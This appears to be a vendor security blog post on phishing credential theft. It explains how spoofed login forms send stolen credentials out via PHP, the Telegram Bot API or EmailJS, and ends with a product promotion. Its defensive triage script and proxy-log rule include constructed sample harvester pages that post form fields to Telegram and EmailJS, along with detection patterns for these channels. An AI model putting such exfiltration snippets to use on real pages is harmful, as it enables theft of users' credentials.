Email spam has long been the prevalent vehicle for phishing and malware distribution. Among its payloads, credential theft remains the most common, even though it is not the most profitable. Lately these attacks have acquired another target: business accounts. But how do they work, and how can you protect yourself against credential theft? Let's take it one step at a time.
What is credentials theft?
The term mostly speaks for itself, but in the context of email spam things are not quite so straightforward. As a subcategory of phishing, credential theft relies on a spoofed website that hosts a login form. Aside from replicating the design of a real login page, the attackers craft a convincing message that pushes the victim to follow the link. The pretext varies: the message may ask you to join an online meeting or to submit your vacation dates, anything that looks natural. Once the victim types their credentials into the form and presses the login button, the attackers receive the data. Still, it is not quite as simple as it sounds.
One vector of credential theft that has become exceptionally popular over the last year targets business email. As you may guess, compromising a personal mailbox is not very profitable, even though it is still the most common outcome of credential theft attacks. By stealing business email accounts, attackers open up new, more effective attack vectors such as spear phishing and whaling. Still, compromised business accounts are rarely used by the same crooks who stole them. Instead, the data is sold on the darknet, bundled into databases of compromised accounts, for a hefty sum.
Modern Credentials Theft Methods
Customising the emails to match the current agenda and baiting the user into following the link: none of this has changed much since email spam was first used for credential theft. What has changed is how the attackers get the credentials out of the spoofed login form. As I mentioned, extracting the data is not just "click the button, send the creds". In fact, things have taken an unexpected twist.
The classic way of sending the data to the attacker, a PHP handler hosted on the phishing site itself, is quite easy to block. Most network security products now flag such submissions, since a login form posting to an unknown PHP script is treated as unsafe even when no malicious intent is suspected. A newer approach, exfiltrating through the Telegram Bot API, is equally easy to block, as its endpoint is a well-known indicator. To get around the blocks imposed by advanced security solutions, attackers have started using the API of a legitimate mailing service, EmailJS.
The EmailJS API allows email to be sent automatically from client-side code alone, using an account's public key together with service and template identifiers embedded in the page. It is convenient for sending predefined, templated emails. Some attackers, however, have wired the API into the spoofed login form so that the submitted fields are mailed straight to their inbox. Because the service is legitimate and widely used, blocking its domain outright is not an option: it would break every site that uses it properly. Meanwhile, the attackers keep receiving stolen credentials without a hitch. A practical check is to inspect the page source: a login form whose submit handler calls the EmailJS SDK, or posts to api.emailjs.com, with no sign of the site's own authentication backend, is a strong indicator of a harvester.
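To make the three exfiltration channels above concrete, here is an added example (my own triage script, not code from this article, from EmailJS or from any phishing kit) that scans a suspected phishing page's source and reports which channel it uses, pulling out the identifiers an analyst would want to report. The three sample pages are constructed for the example; the bot token, chat ID, service and template IDs and public key in them are placeholders, not real identifiers.

```javascript
// Added example (not from the original article): static triage of a
// suspected phishing page, classifying the channel it uses to exfiltrate
// submitted credentials. Sample pages below are constructed; every token,
// chat_id, service/template ID and public key in them is a placeholder.

const EXFIL_SIGNATURES = [
  {
    // Classic kit: the form posts to a PHP handler on the phishing site itself.
    channel: "php-backend",
    test: (src) => /<form[^>]+action=["']?[^"'>\s]*\.php/i.test(src),
    extract: (src) => {
      const m = src.match(/<form[^>]+action=["']?([^"'>\s]*\.php)/i);
      return { handler: m ? m[1] : null };
    },
  },
  {
    // Telegram Bot API: the bot token and chat_id sit in the page source,
    // so they can be extracted for reporting/takedown.
    channel: "telegram-bot-api",
    test: (src) => /api\.telegram\.org\/bot/i.test(src),
    extract: (src) => {
      const tok = src.match(/api\.telegram\.org\/bot(\d+:[A-Za-z0-9_-]+)/i);
      const chat = src.match(/chat_id["']?\s*[:=]\s*["']?(-?\d+)/i);
      return { botToken: tok ? tok[1] : null, chatId: chat ? chat[1] : null };
    },
  },
  {
    // EmailJS: SDK call or REST endpoint mails the form fields to the
    // attacker. Service ID, template ID and public key identify the abused account.
    channel: "emailjs",
    test: (src) => /api\.emailjs\.com|@emailjs\/browser|emailjs\.(?:send|sendForm|init)\s*\(/i.test(src),
    extract: (src) => {
      const ids = src.match(/emailjs\.(?:send|sendForm)\s*\(\s*["']([^"']+)["']\s*,\s*["']([^"']+)["']/i);
      const key = src.match(/(?:emailjs\.init\s*\(\s*|publicKey\s*[:=]\s*)["']([^"']+)["']/i);
      return {
        serviceId: ids ? ids[1] : null,
        templateId: ids ? ids[2] : null,
        publicKey: key ? key[1] : null,
      };
    },
  },
];

function classifyExfil(pageSource) {
  const hits = EXFIL_SIGNATURES
    .filter((sig) => sig.test(pageSource))
    .map((sig) => ({ channel: sig.channel, ...sig.extract(pageSource) }));
  const hasPasswordField = /<input[^>]+type=["']?password/i.test(pageSource);
  // A password field whose contents leave through one of these sinks is the
  // harvester pattern; a page with neither is not flagged.
  const verdict = hasPasswordField && hits.length > 0 ? "likely credential harvester" : "no exfil sink found";
  return { hasPasswordField, hits, verdict };
}

// Constructed sample: classic kit posting to a same-site PHP handler.
const SAMPLE_PHP = `<form action="post.php" method="post">
  <input name="email"><input type="password" name="pass"><button>Sign in</button>
</form>`;

// Constructed sample: Telegram Bot API sink (token and chat_id are placeholders).
const SAMPLE_TELEGRAM = `<form id="f"><input name="email"><input type="password" name="pass"></form>
<script>
document.getElementById("f").onsubmit = async (e) => {
  e.preventDefault();
  const body = new FormData(e.target);
  await fetch("https://api.telegram.org/bot123456789:AAExampleTokenValue/sendMessage?chat_id=-100123456&text=" +
    encodeURIComponent([...body].join("|")));
};
</script>`;

// Constructed sample: EmailJS sink (service, template and key are placeholders).
const SAMPLE_EMAILJS = `<form id="login"><input name="user_email"><input type="password" name="user_password"></form>
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
<script>
  emailjs.init("pk_examplepublickey");
  document.getElementById("login").addEventListener("submit", (e) => {
    e.preventDefault();
    emailjs.sendForm("service_example", "template_example", e.target);
  });
</script>`;

// Usage:
for (const [name, src] of Object.entries({ SAMPLE_PHP, SAMPLE_TELEGRAM, SAMPLE_EMAILJS })) {
  console.log(name, JSON.stringify(classifyExfil(src)));
}
```

The point of extracting the identifiers rather than just returning a yes/no is that the EmailJS service and template IDs, or the Telegram bot token, are what you hand to the provider for an abuse report; the phishing domain itself will be replaced within days.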
Dangers of Credential Theft
Obviously, sharing access to your email account with a third party is a bad situation. Things become even worse with compromised business email, which, as I mentioned, is targeted quite often. How a compromised account gets used depends on its type, though the toolkit the attackers apply is the same in most cases.
Accounts of home users or rank-and-file employees are, in the end, the least valuable. Attackers may use them to spread generic spam. Such mailings are still slightly more effective than spam from a random account, simply because the owner's colleagues and relatives may take the bait, believing the message is legitimate.
Accounts of senior employees, local celebrities or top executives are the most valuable. Such accounts are sometimes sold individually, with price tags in the hundreds of dollars. The prices are justified, since impersonating such a person can bring a much bigger return. In this case the attackers send more sophisticated messages, often tailored to a topic the recipient would expect from that sender.
Credential Theft Prevention Methods
The question of preventing credential theft and putting suitable protection in place has been around for a long time. So I will not repeat trivial advice like "change your passwords" or "don't follow phishing links". Instead, here are some less common but effective tips.
Use email protection tools. There are plenty of them, though most ship as add-ons to standalone anti-malware software. Such tools inspect every attached element, links and files alike, to determine whether it carries anything malicious. The catch is that these add-ons are mostly available only in corporate security solutions.
Another way to reduce the odds of successful phishing is network security tooling. In particular, NDR solutions can detect and weed out potentially dangerous traffic. Prefer ones built on a zero-trust model that can handle misuse of the API mentioned above: since the EmailJS endpoint cannot simply be blocked, the useful signal is which pages are posting to it, not the destination itself. Overall, NDR is recommended for large networks, which are troublesome to control with less advanced tools.
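As an added illustration (not the article's own material, and not tied to any particular NDR product), here is the kind of rule such a tool would run over proxy logs: instead of blocking api.emailjs.com, it flags POSTs to the EmailJS send endpoint or the Telegram Bot API whose referring page is not on an assumed allowlist of our own sites. The log format, the log lines and the allowlist are all constructed for this example; the bot token in the sample URL is a placeholder.

```javascript
// Added example (not from the original article): a proxy-log rule that flags
// form data leaving the network through legitimate-but-abusable APIs instead
// of blocking those services outright. Log lines, log format and allowlist
// are constructed for this example.

const WATCHED_ENDPOINTS = [
  // Prefix match on the path, so variants of the send endpoint are included.
  { name: "EmailJS send API", host: "api.emailjs.com", path: /^\/api\/v1\.0\/email\/send\b/ },
  { name: "Telegram Bot API", host: "api.telegram.org", path: /^\/bot\d+:[\w-]+\/sendMessage\b/ },
];

// Assumed allowlist: our own sites that legitimately use these services.
const ALLOWED_REFERRERS = new Set(["contact.example-corp.com"]);

// Constructed log format: <timestamp> <client-ip> <method> <url> <referer|-> <status>
const SAMPLE_PROXY_LOG = [
  "2024-05-02T09:14:03Z 10.0.4.21 GET https://login-portal.example-phish.test/index.html - 200",
  "2024-05-02T09:14:19Z 10.0.4.21 POST https://api.emailjs.com/api/v1.0/email/send https://login-portal.example-phish.test/index.html 200",
  "2024-05-02T09:20:44Z 10.0.7.8 POST https://api.emailjs.com/api/v1.0/email/send https://contact.example-corp.com/contact 200",
  "2024-05-02T09:31:05Z 10.0.4.21 POST https://api.telegram.org/bot123456789:AAExampleTokenValue/sendMessage https://secure-docs.example-phish.test/ 200",
  "2024-05-02T09:32:00Z 10.0.9.3 GET https://api.emailjs.com/ - 200",
];

function parseLogLine(line) {
  const [ts, client, method, url, referer, status] = line.trim().split(/\s+/);
  return {
    ts, client, method, status,
    url: new URL(url),
    referer: referer && referer !== "-" ? new URL(referer) : null,
  };
}

// Returns an alert object, or null when the line is benign under this rule.
function evaluateLine(line) {
  const e = parseLogLine(line);
  if (e.method !== "POST") return null;                          // only submissions matter
  const ep = WATCHED_ENDPOINTS.find((w) => w.host === e.url.hostname && w.path.test(e.url.pathname));
  if (!ep) return null;                                          // not an exfil-capable endpoint
  const refHost = e.referer ? e.referer.hostname : null;
  if (refHost && ALLOWED_REFERRERS.has(refHost)) return null;    // our own legitimate use
  return {
    ts: e.ts,
    client: e.client,
    endpoint: ep.name,
    referrer: refHost || "(none)",
    reason: refHost
      ? `POST to ${ep.name} from a page on unapproved site ${refHost}`
      : `POST to ${ep.name} with no referring page`,
  };
}

function findAlerts(lines) {
  return lines.map(evaluateLine).filter(Boolean);
}

// Usage:
for (const alert of findAlerts(SAMPLE_PROXY_LOG)) console.log(JSON.stringify(alert));
```

The allowlist is deliberately on the referring page, not on the client IP: a user who lands on a phishing page and a user who fills in a legitimate contact form both talk to the same API host, and only the page that drove the POST tells them apart. A referrer-less POST is still worth a look, since some kits strip it, which is why it is flagged rather than dropped.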
For individual users: use anti-malware software with an advanced network filter. Spotting phishing pages like those used in credential theft is not easy by hand, so it is better left to specialised security software. GridinSoft Anti-Malware offers such functionality; its network filter is updated every hour to keep up with newly appearing malicious sites.